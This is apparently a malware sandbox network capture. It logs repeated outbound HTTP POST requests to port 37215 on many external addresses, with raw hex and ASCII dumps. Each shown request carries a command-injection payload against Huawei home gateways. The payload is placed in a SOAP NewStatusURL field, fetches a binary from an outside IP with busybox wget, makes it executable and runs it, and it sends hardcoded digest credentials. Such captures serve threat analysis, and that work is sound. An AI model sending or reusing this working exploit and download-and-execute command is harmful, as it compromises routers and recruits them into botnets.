                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2371192.168.2.1555236190.206.191.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471373081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2372192.168.2.153747094.225.205.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471434116 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2373192.168.2.155381431.208.6.24837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471451998 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2374192.168.2.1540806181.178.48.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471467972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2375192.168.2.155780031.217.115.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471492052 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2376192.168.2.1541526122.88.7.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471507072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2377192.168.2.1556048121.186.181.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471524954 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2378192.168.2.1546122138.115.127.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471543074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2379192.168.2.153673631.152.232.11337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471656084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2380192.168.2.1560764157.79.3.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471678972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2381192.168.2.1552888197.73.241.11937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.471678972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
